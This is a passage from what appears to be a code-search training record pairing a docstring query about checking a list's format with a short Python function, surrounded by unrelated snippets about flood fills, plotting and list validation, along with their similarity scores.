print(fill_list(CONSTANTE_DEBUT,CONSTANTE_FIN,TAILLE_MAX))\r\n print(\"test 2\")\r\n # on teste avec des valeurs non comprses dans l'intervalle(sauf la première)\r\n print(fill_list(CONSTANTE_DEBUT, CONSTANTE_FIN, TAILLE_MAX))\r\n print(\"test 3\")\r\n #on saisie de suite une valeur incorrecte\r\n print(fill_list(CONSTANTE_DEBUT, CONSTANTE_FIN, TAILLE_MAX))\r\n\r\n #on teste avec des intervalles plus grandes\r\n print(\"on teste avec des intervalles plus grandes\")\r\n print(\"test 1\")\r\n # on teste avec que des valeurs comprises entre 0 et 1000\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))\r\n print(\"test 2\")\r\n # on teste avec des valeurs non comprses dans l'intervalle(sauf la première)\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))\r\n print(\"test 3\")\r\n # on saisie de suite une valeur incorrecte\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))", "def fill(self, x, y, color):\n raise NotImplementedError # Override this function in the Solution classes", "def points_generator(self):\n rows, cols = self.game.board.board_size\n points = [Point(i, j) for i, j in product(range(rows), range(cols))]\n for point in points:\n yield point", "def clear(self, points, lmap):\n for coord in points:\n if lmap.cellWithinBoundaries(coord):\n color = self.colorMap(lmap.getCell(coord))\n self.im.put(color, coord)\n self.zoomMap(self.scale)", "def pts(self, pts):\n\n self._pts = pts", "def toFillPolygons(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def assign_points(players):\n pass", "def fillIn(self):\n\n # Grabs first point (which is a shore) and prefills in hashes\n toBeAnalyzed = [self.points[0]]\n islandHash = defaultdict(list)\n islandHash[toBeAnalyzed[0].x].append(toBeAnalyzed[0].x)\n islandGridPoints = toBeAnalyzed[:]\n\n # Find all points not at pond-level.\n while toBeAnalyzed:\n gridPoint = toBeAnalyzed.pop()\n neighbors = self.analyzeData.iterateDiagonal(gridPoint.x,\n gridPoint.y)\n for _x, _y, elevation in neighbors:\n\n if elevation != self.pondElevation and _y not in\\\n islandHash[_x]:\n branch = GridPoint(_x, _y, elevation)\n islandHash[_x].append(_y)\n toBeAnalyzed.append(branch)\n islandGridPoints.append(branch)\n self.points = islandGridPoints", "def fillingrid(self):\n\n if self.imagearray is None:\n if self.gs.isfixed:\n for n in range(0, self.numcols):\n self.vspins[n].setValue(self.currentvalues[n])\n elif self.gs.isperc:\n for n in range(0, self.numcols):\n self.fillinpercent(n)\n else:\n for n in range(0, self.numcols):\n self.nsspins[n].setValue(self.currentnsigs[n])\n else:\n for n in range(0, self.numcols):\n self.vspins[n].setValue(self.currentvalues[n])\n self.nsspins[n].setValue(self.currentnsigs[n])\n self.fillinpercent(n)", "def _numberOfPoints_changed(self):\n self.reinitialiseData()", "def __fillCoordinatesFromSource(self):\n self.xValues = []\n if self.yCoordinates:\n self.yValues = []\n if self.zCoordinates:\n self.zValues = []\n if self.clusterLabels:\n self.clusterValues = []\n if self.mixtureLabels:\n self.mixtureValues = []\n\n # initial setup for x,y,z Values, clusterValues, mixtureValues, and colorMapValues\n for pltIndex in range(len(self.outStreamTypes)):\n self.xValues.append(defaultdict(list))\n if self.yCoordinates:\n self.yValues.append(defaultdict(list))\n if self.zCoordinates:\n self.zValues.append(defaultdict(list))\n if self.clusterLabels:\n self.clusterValues.append(defaultdict(list))\n if self.mixtureLabels:\n self.mixtureValues.append(defaultdict(list))\n if self.colorMapCoordinates[pltIndex] is not None:\n self.colorMapValues[pltIndex] = defaultdict(list)\n\n # fill x,y,z Values, clusterValues, mixtureValues, and colorMapValues\n for pltIndex in range(len(self.outStreamTypes)):\n if len(self.sourceData[pltIndex]) == 0:\n return False\n dataSet = self.sourceData[pltIndex].asDataset()\n # anything but HistorySet\n if self.sourceData[pltIndex].type.strip() != 'HistorySet':\n for i in range(len(self.xCoordinates[pltIndex])):\n xSplit = self._returnSplitIndex('x', pltIndex, i)\n self.xValues[pltIndex][1].append(np.asarray(dataSet[xSplit].values.astype(float, copy=False)))\n if self.yCoordinates:\n for i in range(len(self.yCoordinates[pltIndex])):\n ySplit = self._returnSplitIndex('y', pltIndex, i)\n self.yValues[pltIndex][1].append(np.asarray(dataSet[ySplit.strip()].values.astype(float, copy=False)))\n if self.zCoordinates and self.dim > 2:\n for i in range(len(self.zCoordinates[pltIndex])):\n zSplit = self._returnSplitIndex('z', pltIndex, i)\n self.zValues[pltIndex][1].append(np.asarray(dataSet[zSplit.strip()].values.astype(float, copy=False)))\n if self.clusterLabels:\n for i in range(len(self.clusterLabels[pltIndex])):\n clusterSplit = self._returnSplitIndex('clusterLabels', pltIndex, i)\n self.clusterValues[pltIndex][1].append(np.asarray(dataSet[clusterSplit.strip()].values.astype(float, copy=False)))\n if self.mixtureLabels:\n for i in range(len(self.mixtureLabels[pltIndex])):\n mixtureSplit = self._returnSplitIndex('mixtureLabels', pltIndex, i)\n self.mixtureValues[pltIndex][1].append(np.asarray(dataSet[mixtureSplit.strip()].values.astype(float, copy=False)))\n if self.colorMapCoordinates[pltIndex] is not None:\n for i in range(len(self.colorMapCoordinates[pltIndex])):\n cSplit = self._returnSplitIndex('colorMap', pltIndex, i)\n self.colorMapValues[pltIndex][1].append(np.asarray(dataSet[cSplit.strip()].values.astype(float, copy=False)))\n # check if the array sizes are consistent\n sizeToMatch = self.xValues[pltIndex][1][-1].size\n if self.yCoordinates and self.yValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<y> variable has a size ({self.yValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<z> variable has a size ({self.zValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.colorMapCoordinates[pltIndex] is not None and self.colorMapValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<colorMap> variable has a size ({self.colorMapValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n else:\n # HistorySet\n pivotParam = self.sourceData[pltIndex].indexes[0]\n for cnt in range(len(self.sourceData[pltIndex])):\n maxSize = 0\n for i in range(len(self.xCoordinates[pltIndex])):\n xSplit = self._returnSplitIndexHS('x', pltIndex, i)\n # for variable from input space, it will return array(float), not 1d array\n self.xValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[xSplit].values.astype(float, copy=False)))\n maxSize = self.xValues[pltIndex][cnt][-1].size if self.xValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.yCoordinates:\n for i in range(len(self.yCoordinates[pltIndex])):\n ySplit = self._returnSplitIndexHS('y', pltIndex, i)\n self.yValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[ySplit].values.astype(float, copy=False)))\n maxSize = self.yValues[pltIndex][cnt][-1].size if self.yValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.zCoordinates and self.dim > 2:\n for i in range(len(self.zCoordinates[pltIndex])):\n zSplit = self._returnSplitIndexHS('z', pltIndex, i)\n self.zValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[zSplit].values.astype(float, copy=False)))\n maxSize = self.zValues[pltIndex][cnt][-1].size if self.zValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.colorMapCoordinates[pltIndex] is not None:\n for i in range(len(self.colorMapCoordinates[pltIndex])):\n colorSplit = self._returnSplitIndexHS('colorMap', pltIndex, i)\n self.colorMapValues[pltIndex][cnt].append(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[colorSplit].values.astype(float, copy=False))\n maxSize = self.colorMapValues[pltIndex][cnt][-1].size if self.colorMapValues[pltIndex][cnt][-1].size > maxSize else maxSize\n # expand the scalars in case they need to be plotted against histories\n if self.xValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.xValues[pltIndex][cnt][-1] = np.full(maxSize, self.xValues[pltIndex][cnt][-1])\n if self.yCoordinates and self.yValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.yValues[pltIndex][cnt][-1] = np.full(maxSize, self.yValues[pltIndex][cnt][-1])\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.zValues[pltIndex][cnt][-1] = np.full(maxSize, self.zValues[pltIndex][cnt][-1])\n if self.colorMapCoordinates[pltIndex] is not None and self.colorMapValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.colorMapValues[pltIndex][cnt][-1] = np.full(maxSize, self.colorMapValues[pltIndex][cnt][-1])\n # check if the array sizes are consistent\n if self.yCoordinates and self.yValues[pltIndex][cnt][-1].size != maxSize:\n self.raiseAnError(Exception, f\"<y> variable has a size ({self.yValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][cnt][-1].size != maxSize:\n self.raiseAnError(Exception, f\"<z> variable has a size ({self.zValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.colorMapCoordinates[pltIndex] is not None and len(self.colorMapValues[pltIndex][cnt][-1]) != maxSize:\n self.raiseAnError(Exception, f\"<colorMap> variable has a size ({self.colorMapValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n\n # check if values have been filled\n if len(self.xValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.xValues[pltIndex]:\n if len(self.xValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.xValues[pltIndex][key])):\n if self.xValues[pltIndex][key][i].size == 0:\n return False\n if self.yCoordinates:\n if len(self.yValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.yValues[pltIndex]:\n if len(self.yValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.yValues[pltIndex][key])):\n if self.yValues[pltIndex][key][i].size == 0:\n return False\n if self.zCoordinates and self.dim > 2:\n if len(self.zValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.zValues[pltIndex]:\n if len(self.zValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.zValues[pltIndex][key])):\n if self.zValues[pltIndex][key][i].size == 0:\n return False\n if self.clusterLabels:\n if len(self.clusterValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.clusterValues[pltIndex]:\n if len(self.clusterValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.clusterValues[pltIndex][key])):\n if self.clusterValues[pltIndex][key][i].size == 0:\n return False\n if self.mixtureLabels:\n if len(self.mixtureValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.mixtureValues[pltIndex]:\n if len(self.mixtureValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.mixtureValues[pltIndex][key])):\n if self.mixtureValues[pltIndex][key][i].size == 0:\n return False\n if self.colorMapCoordinates[pltIndex] is not None:\n if len(self.colorMapValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.colorMapValues[pltIndex]:\n if len(self.colorMapValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.colorMapValues[pltIndex][key])):\n if self.colorMapValues[pltIndex][key][i].size == 0:\n return False\n\n return True" ]
[ "0.6888405", "0.6835494", "0.673464", "0.6689272", "0.6534429", "0.64859575", "0.6433665", "0.6427808", "0.6359302", "0.6349332", "0.63460994", "0.6302308", "0.6204271", "0.617405", "0.61379343", "0.6130424", "0.6078132", "0.6070575", "0.60653776", "0.60491824", "0.6038039", "0.602961", "0.6016361", "0.5982649", "0.5973803", "0.5968475", "0.59589314", "0.5941821", "0.59351885", "0.5928583", "0.59139645", "0.59098876", "0.59014404", "0.5898659", "0.5894225", "0.5889709", "0.5868676", "0.58548564", "0.58425146", "0.5819542", "0.58140707", "0.58139014", "0.5789529", "0.5780595", "0.5777499", "0.5772272", "0.57519794", "0.57408124", "0.57406706", "0.57133085", "0.5711898", "0.5700518", "0.5691507", "0.5689315", "0.56876606", "0.5685264", "0.5679797", "0.5679797", "0.5679276", "0.5671241", "0.5670391", "0.5663372", "0.56622726", "0.56527245", "0.565084", "0.56459874", "0.5641901", "0.5636375", "0.5631482", "0.5628149", "0.5625695", "0.5622917", "0.5613354", "0.5602308", "0.5590269", "0.55707556", "0.5561794", "0.55595785", "0.55561477", "0.55375874", "0.5535752", "0.5535159", "0.5529766", "0.55228996", "0.5514656", "0.5511208", "0.5503896", "0.5503896", "0.54988045", "0.5491936", "0.5491699", "0.54890263", "0.54826087", "0.54732645", "0.5472633", "0.5472157", "0.547049", "0.5468832", "0.5460318", "0.54567283" ]
0.61397636
14
Checks whether a given list is in the correct format.
def check_if_number(list): for item in list: try: float(item) except ValueError as e: print WrongTypePointError(item) sys.exit()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _is_in_list(l, valid_l):\n\n for elem in l:\n if Settings._is_primitive(elem):\n if not Settings._is_in_prim(elem, valid_l):\n return False\n elif Settings._is_list(elem):\n valid_lists = [l for l in valid_l if isinstance(l, list)]\n if not Settings._is_sublist_in_one_of_lists(elem, valid_lists):\n return False\n elif Settings._is_dict(elem):\n valid_dicts = [d for d in valid_l if isinstance(d, dict)]\n if not Settings._is_dict_in_one_of_dicts(elem, valid_dicts):\n return False\n else:\n raise InvalidSettingError()\n return True", "def check_list(self,list_input):\n if not isinstance(list_input,list):\n raise ValueError('input is not in list type')\n for i in list_input:\n if isinstance(i,list) and len(i) != 0:\n for j in i:\n if not isinstance(j,(float,int)):\n print(j)\n raise ValueError('cannot convert')\n else:\n print(i)\n raise ValueError('wrong defined')", "def check_for_list(check):", "def list_check(lst):\n for item in lst:\n if type(item) != list:\n return False\n return True", "def _is_valid_list(content_type: str) -> bool:\n content_type = content_type.strip()\n\n if not content_type.startswith(\"pt:list\"):\n return False\n\n if not _has_matched_brackets(content_type):\n return False\n\n if not _has_brackets(content_type):\n return False\n\n sub_types = _get_sub_types_of_compositional_types(content_type)\n if len(sub_types) != 1:\n return False\n\n sub_type = sub_types[0]\n return _is_valid_pt(sub_type)", "def _list_validity_check(l, valid_l):\n\n if not Settings._is_in_list(l, valid_l):\n raise InvalidSettingError()", "def is_list_of_list(self) -> bool:\n return bool(AnnotationWrapper.list_of_list_re.match(self.data))", "def is_valid_listing(game_listing):\n try:\n int(game_listing.split(\".\")[0])\n return True\n except Exception as e:\n return False", "def isList(data):\n\ttry:\n\t\tfrom types import ListType\n\t\tif type(data) == ListType:\n\t\t\treturn True\n\texcept ImportError:\n\t\tif type(data) == type([]):\n\t\t\treturn True\n\treturn False", "def is_valid_integer_list(any_list):\n list_object = json.loads(any_list)\n return not any(not is_valid_integer(str(listing_id)) for listing_id in\n list_object)", "def _is_sublist_in_one_of_lists(sublist, lists):\n\n type_to_one_of = Settings._get_type_to_one_of()\n\n for vl in lists:\n next_vl = False\n for e in sublist:\n if Settings._is_primitive(e):\n t = 'primitive'\n elif Settings._is_list(e):\n vl = [l for l in vl if isinstance(l, list)]\n t = 'list'\n elif Settings._is_dict(e):\n vl = [d for d in vl if isinstance(d, dict)]\n t = 'dict'\n else:\n raise InvalidSettingError()\n\n if not type_to_one_of[t](e, vl):\n next_vl = True\n break\n\n if next_vl:\n continue\n return True\n return False", "def IsValidInputType(self, list_of_matches):\n for entry in list_of_matches:\n if not entry:\n return False\n\n return True", "def checkInput(Matrix,List):\r\n \r\n if type(Matrix) != list or type(List) != list:\r\n \r\n raise RuntimeError('malformed')\r\n for k in Matrix:\r\n if type(k) != list:\r\n \r\n raise RuntimeError('malformed')\r\n if len(k) != len(List):\r\n \r\n raise RuntimeError('malformed')\r\n for j in k:\r\n if type(j) != int and type(j) != float:\r\n \r\n raise RuntimeError('malformed')\r\n if j > 30:\r\n \r\n raise RuntimeError('malformed')\r\n for p in List:\r\n if type(p) != str:\r\n \r\n raise RuntimeError('malformed')\r\n\r\n if len(Matrix) != len(List):\r\n \r\n raise RuntimeError('malformed')\r\n return", "def check_list(source, value):\n try:\n return value in json.loads(source)\n except:\n return False", "def isValidTypeForList(self, *args):\n return _libsbml.SBasePlugin_isValidTypeForList(self, *args)", "def _should_be_pair(s_list):\n assert(isa(s_list, List))\n return str(s_list).find(' . ') > 0", "def isList(memoryManager, paramsList):\n if isEmptyList(paramsList):\n return [1.0]\n A = paramsList[0]\n if validateList(A):\n return [0.0] if len(A) <= 1 else [1.0]\n return [0.0]", "def output_is_valid(output):\n\n is_correct = type(output) is list\n for member in output:\n is_correct *= type(member) is list\n for item in member:\n is_correct *= type(item) is tuple and len(item) == 2\n\n return bool(is_correct)", "def _check_nested_floats(thelist):\n result = True\n for item in thelist:\n if type(item) in [list,tuple]:\n result = result and _check_nested_floats(item)\n else:\n result = result and type(item) in [int,float]\n return result", "def test_list_format(self) -> None:\n r = self.perform_request('list', False)\n self.assert_json_schema(r.json(), self.get_list_schema())", "def _is_list(item):\n return isinstance(item, list)", "def _is_list(arg):\n return isinstance(arg, collections.Sequence) and not _is_string(arg)", "def check_data_is_format(data):\n try:\n data_lst = data\n if not isinstance(data, list):\n data_lst = json.loads(data)\n\n for data in data_lst:\n if not isinstance(data, dict):\n raise ValueError(\"data contains not dict\")\n\n for key in data.keys():\n check_type(key)\n except ValueError as e:\n logging.error(\"data format check error %s\" % e)\n return False, None\n except Exception as e:\n logging.error(\"data format check unknown error %s\" % e)\n return False, None\n else:\n return True, data_lst", "def is_list(s_list):\n return isa(s_list, List)", "def validate_X(X: List[str]):\n _check_string_list(X)", "def validate_list(types,val,allowed,tname):\n if not len(types): return TYPE_MISMATCH\n if type(val) not in TYPES[tname]: raise Exception('unknown type')\n for v in val:\n result=VALIDATORS[types[-1]](types[:-1],v,allowed,types[-1])\n if not result: return result\n return True", "def _is_list(self):\n # TODO\n if self.is_int():\n return self.int() == 0\n else:\n return self.size_words() == 2 and self.tag() == 0 and self.field(1)._is_list()", "def check_list_exists(this_list=[]):\n if isinstance(this_list, list) and len(this_list) > 0:\n return True\n else:\n return False", "def is_list(self) -> bool:\n return False", "def is_valid_string_listing(listing):\n assert listing is not None\n listing = str(listing)\n if len(listing) == 0:\n return True\n list_object = json.loads(listing)\n return not any(key not in listing_keys\n for key in list_object)", "def is_list(self) -> bool:\n if self.is_list_of_list: # pylint: disable=R1705\n return False\n else:\n return bool(AnnotationWrapper.list_field_re.match(self.data))", "def is_list ( self, s ):\r\n\t\treturn isinstance ( s, type( list () ) )", "def is_in_list(item, list_, kind):\n if item not in list_:\n raise KeyError(f'Specify {kind} from {list_}: got {item}')\n return True", "def string_is_index_list(inp: str):\n inp = inp.strip()\n return len((inp)) > 0 and all([x in [\" \", \":\", \"-\"] or x.isdigit() for x in inp])", "def validate(self, list_value):\n errors = DataDefinition.validate(self, list_value)\n if errors:\n return errors\n\n for index, value in enumerate(list_value):\n errors = self.element_type.validate(value)\n if errors:\n msg = message_factory.get_message(\n 'vapi.data.list.invalid.entry',\n str(value), index)\n return [msg] + errors\n\n return None", "def _can_be_list(pair):\n assert(isa(pair, Pair))\n return str(pair).find(' . ') < 0", "def is_sequence_of_list(items):\n return all(isinstance(item, list) for item in items)", "def _check_multilabel_list(obj: Any):\n if not isinstance(obj, list):\n raise TypeError(f\"obj must be a list, got '{type(obj)}'\")\n\n if len(obj) > 0:\n if not isinstance(obj[0], list):\n raise TypeError(f\"obj must contain lists, got '{type(obj[0])}'\")\n\n if len(obj[0]) > 0:\n if not isinstance(obj[0][0], str):\n raise TypeError(\n f\"obj must contain lists of strings, got lists of '{type(obj[0][0])}'\"\n )", "def isList(self, item):\n\t retval = False\n\t if type(item) in (ListType, TupleType) :\n\t retval = True", "def _is_list(val):\n\n return isinstance(val, list)", "def validate_list(parser, listname):\r\n if (valid_ogfile(listname) and valid_resfile(listname)):\r\n return listname\r\n else:\r\n parser.error(\"Filename error: %s\" % listname)", "def args_is_good(arg_list: list) -> bool:\n usage_msg = (\n \"Usage: python operations.py <number1> <number2>\\n\"\n \"Example:\\n\"\n \" python operations.py 10 3\\n\"\n )\n too_many_msg = \"InputError: too many arguments\\n\"\n only_numbers_msg = \"InputError: only numbers\\n\"\n if len(arg_list) == 1:\n print(usage_msg)\n return False\n if len(arg_list) > 3:\n print(too_many_msg, usage_msg)\n return False\n try:\n a, b = int(arg_list[1]), int(arg_list[2])\n # discarding floats here, even those like 5.0\n # use float.is_integer() if need to keep those\n # keeping only 42 or \"42\" (ints with or without quotes)\n if arg_list[1] == str(a) and arg_list[2] == str(b):\n return True\n except TypeError:\n print(only_numbers_msg, usage_msg)\n return False", "def _check_size_of_lists(sequence_header, secstr_header):\n if len(sequence_header) != len(sequence):\n sys.exit(\"The size of the sequence list and sequence header doesn't match\")\n else:\n return True", "def _validate_list_type(self, name, obj, *args):\n if obj is None:\n return\n if isinstance(obj, list):\n for i in obj:\n self._validate_type_not_null(name, i, *args)\n else:\n self._validate_type(name, obj, *args)", "def validate_loans(loans):\n def validate_loan(loan):\n return (type(loan)==list or type(loan)==tuple) and len(loan)==3 \\\n and type(loan[0])==str and type(loan[1])==str and loan[1] in database.LOANABLE_RESOURCES and type(loan[2])==int and loan[2]>=0\n return type(loans)==list and False not in [validate_loan(load) for loan in loans]", "def is_listlike(x: Any) -> bool:\r\n return (isinstance(x, (list, tuple)))", "def _validate_list_data(self, expected, actual):\n for e in expected:\n if e not in actual:\n return \"expected item {} not found in actual list\".format(e)\n return None", "def empty_list(input_list):\n for item in input_list:\n if not isinstance(item, list) or not empty_list(item):\n return False\n return True", "def check_IP_addr(self, iplist):\n\n if type(iplist) != list:\n print(\"Error: please provide a list of IPv4 addresses to check (as a list of strings).\")\n return False\n\n for ip_addr in iplist:\n # Converts ip_addr to string, in case of bad type being passed\n ip_addr = str(ip_addr)\n\n # Checks ip_addr format\n try: \n inet_aton(ip_addr)\n except:\n print(\"Error: '{}' is an invalid IPv4 address.\\n\"\\\n \"Please use a valid IPv4 address (e.g.: 192.168.0.1)\".format(ip_addr))\n return False\n return True", "def _validate_list_of_dict(list_of_dict):\n return isinstance(list_of_dict, list) and 'pr' in list_of_dict[0] and 'issue' in list_of_dict[0]", "def check_list_valid_input(modname, objname, objdict, indent=''):\n\n cnts = [0] * NUMCNTS\n # how to name list\n if pfwdefs.SW_FILEPAT not in objdict and pfwdefs.FILENAME not in objdict:\n error(indent, \"module %s, %s, %s - Missing terms needed to determine list filename\" % (modname, pfwdefs.SW_INPUTS, objname))\n cnts[ERRCNT_POS] += 1\n\n # directory location for list\n if pfwdefs.DIRPAT not in objdict:\n error(indent, \"module %s, %s, %s - Missing %s\" % (modname, pfwdefs.SW_INPUTS, objname, pfwdefs.DIRPAT))\n cnts[ERRCNT_POS] += 1\n\n # what goes into the list\n if pfwdefs.DIV_LIST_BY_COL not in objdict and 'columns' not in objdict:\n error(indent, \"module %s, %s, %s - Missing terms needed to determine column(s) in list(s) (%s or %s)\" % (modname, pfwdefs.SW_INPUTS, objname, pfwdefs.DIV_LIST_BY_COL, 'columns'))\n cnts[ERRCNT_POS] += 1\n\n return cnts", "def isList(l):\r\n return hasattr(l, '__iter__') \\\r\n or (type(l) in (types.ListType, types.TupleType))", "def is_list_of(seq, expected_type):\n return is_seq_of(seq, expected_type, seq_type=list)", "def test_list(self, items: list) -> None:\r\n if not isinstance(items, list):\r\n raise ValueError(f'Expected list, but received {type(items)}')\r\n for item in items:\r\n if isinstance(item, dict):\r\n self.test_dict(dictionary=item)\r\n elif isinstance(item, list):\r\n self.test_list(items=item)", "def list_type(verifield, required):\n if verifield is None: return True\n if not isinstance(verifield, list): return False\n all_of = [value or True for value in verifield if isinstance(value, required) or value is None]\n return not verifield or (all(all_of or [False]) and len(all_of) == len(verifield))", "def is_entry_in_list(entry, a_list):\n for item in a_list:\n if entry['description'] == item['description']:\n return True\n return False", "def isList(x):\n \n return ( type(x) == list ) # True if the type of x is a list", "def list_check(*args, func=None):\n func = func or inspect.stack()[2][3]\n for var in args:\n if not isinstance(var, (list, collections.UserList, collections.abc.MutableSequence)):\n name = type(var).__name__\n raise ListError(\n 'Function {} expected list, {} got instead.'.format(func, name))", "def _list_like(self, value):\n return (not hasattr(value, \"strip\") and\n (hasattr(value, \"__getitem__\") or\n hasattr(value, \"__iter__\")))\n # return is_sequence(value) # use from pandas.core.common import is_sequence", "def list_check(listz):\n isValid = False\n x = 0\n position = ''\n\n #checking if characters contains 023 and extracting them \n\n while (x < len(listz)):\n if(listz.__contains__(0)):\n position = position + str(listz[listz.index(0)])\n if(listz.__contains__(2)):\n position = position + str(listz[listz.index(2)])\n if(listz.__contains__(3)):\n position = position + str(listz[listz.index(3)])\n x = len(listz) + 1\n\n#making sure its the requered sequence\n\n if(position == '023'):\n isValid = True\n x = x + 1\n return isValid", "def is_list(value):\n return isinstance(value, list)", "def in_zip_list(verifield, checklist):\n valid_dims = zip( *checklist )\n return verifield[0] in valid_dims[0] and verifield[1] in valid_dims[1]", "def is_list(self):\n answer = self._call('is_list')\n return answer.yes", "def _check_string_list(obj: Any):\n if not isinstance(obj, list):\n raise TypeError(f\"obj must be a list, got '{type(obj)}'\")\n if len(obj) > 0 and not isinstance(obj[0], str):\n raise TypeError(f\"obj must contain strings, got '{type(obj[0])}'\")", "def _compare_lists(got, expected):\n\n # Validate Types\n if not isinstance(got, types.ListType) or not isinstance(expected, types.ListType):\n logger._warn(\"Parameters should be lists\")\n logger._warn(type(got))\n logger._warn(type(expected))\n return False\n\n # Compare size\n if len(got) != len(expected):\n logger._warn(\"Number of items do not match\")\n return False\n\n # Compare values\n for a in got:\n a = a.strip()\n if a not in expected:\n logger._warn(\"'%s' not present in expected list\" % a)\n return False\n\n return True", "def _validate_resource_list(pkt):\n rlist = pkt._required_data.get('ResourceList')\n if rlist is not None:\n if not isinstance(rlist, list):\n raise PacketInvalidData(\"ResourceList must be a list\")\n if len(rlist) != 1:\n raise PacketInvalidData(\"ResourceList must have exactly one element\")\n\n return True", "def a_list(test_val: object, test_col: object, valid_values: object) -> object:\n tv_upper = test_val.upper()\n rc: bool = True\n # noinspection PyTypeChecker\n value_list = [x[test_col] for x in valid_values]\n value_list_upper = [x.upper() for x in value_list]\n if tv_upper not in value_list_upper:\n print(f'{test_val} is invalid. Valid values are {str(value_list)}')\n rc = False\n return rc", "def compare(lst1):\n brackets = list(\"{[()]}\")\n check = []\n for i in range(len(lst1)):\n check.append(lst1[i] in brackets)\n return all(check)", "def _prepare_and_validate_data(self,data_list):\n pos=0\n list_pos=0\n format=\"\"\n length=0\n value=\"\"\n\n #check number of items in data_list is as expected\n if(self.data_lookup.count()['type']!=len(data_list)):\n raise NumItemsError(\"Wrong number of items for the data type\")\n\n #loop over data from data_types.csv and populate\n for index,row in self.data_lookup.iterrows():\n length=int(row['Bytes'])\n\n #obtain format type\n if (row['Format']=='byte'):\n format=int\n elif (row['Format']=='string'):\n format=str\n\n #obtain limits\n try:\n min=int(row['Min'],16)\n max=int(row['Max'],16)\n except:\n min='*'\n max='*'\n\n #check format type\n if (isinstance(data_list[list_pos],format)):\n #correct format type\n if format==str:\n value=data_list[list_pos].encode()\n elif format==int:\n value=data_list[list_pos].to_bytes(length,'little')\n\n #check limits if int type\n if min=='*' or max == '*':\n pass\n elif int(data_list[list_pos]) >= min and int(data_list[list_pos]) <= max:\n pass\n else:\n raise ValueError(\"value\",int(value),\"is out of range, min:\",min,\"max:\",max)\n else:\n raise TypeError(\"Unknown type, can currently only handle string or integer types\")\n #populate data\n for n in range(0,length):\n self.data[pos+n]=value[n]\n pos=pos+length\n list_pos=list_pos+1\n else:\n raise TypeError(\"expected\",format,\"got\",type(data_list[list_pos]),\"at position\",list_pos)\n return True", "def test_list_of_equal_len():\n\n @type_checked\n def _run_test(something:[str, int, bool]):\n assert isinstance(something[0], str)\n assert isinstance(something[1], int)\n assert isinstance(something[2], bool)\n\n _run_test(something=[None, \"12\", 1])", "def test_list_representation(self):\n \n lr = ['- L1\\n- L2\\n- L3',\n 'text\\n- L1\\n- L2\\ntext\\n- L3',\n '* H\\n- L1\\n - L2\\n** H\\n- L3',\n ' - L1\\n - L2\\n - L3',\n '- L1\\n - L2\\n - L3'\n ]\n\n for l in lr:\n self.assertEqual(l, str(parser.parse(l)))", "def in_pairlist(exp, pairlist):\n if pairlist.null():\n return False\n if pairlist.car().atom():\n raise error.LispException(\"a-list or d-list in wrong format\")\n if exp == pairlist.car().car():\n return True\n return in_pairlist(exp, pairlist.cdr())", "def test_listify(string, cast, expected):\n assert listify(string, cast) == expected", "def check_unordered_list(line):\n if line[:2] == '* ' or line[:2] == '- ' or line[:2] == '+ ' and len(line) > 2:\n return True, '<ul><li>' + line[2:] + '</li></ul>'\n return False, ''", "def is_list_of_strings(vals):\n try:\n # check if everything is a string\n for val in vals:\n if not isinstance(val, six.string_types):\n return False\n except Exception:\n # vals is not enumerable\n return False\n\n # everything is a string\n return True", "def is_list_like(value):\n if is_iterable(value) and not isinstance(value, six.string_types):\n return True\n\n else:\n return False", "def _list4_validator(_: object, attrib: 'attrs.Attribute[List[Vec]]', value: object) -> None:\n if not isinstance(value, list):\n raise TypeError(attrib.name + ' should be a list!')\n if len(value) != 4:\n raise ValueError(attrib.name + ' must have 4 values!')", "def check_inputs(self, inputs):\n if self.debug:\n print(\"Checking inputs\")\n result = True\n for _input in inputs:\n if \"word_\" in _input and inputs[_input] == \"\":\n result = False\n elif \"idiom_\" in _input and 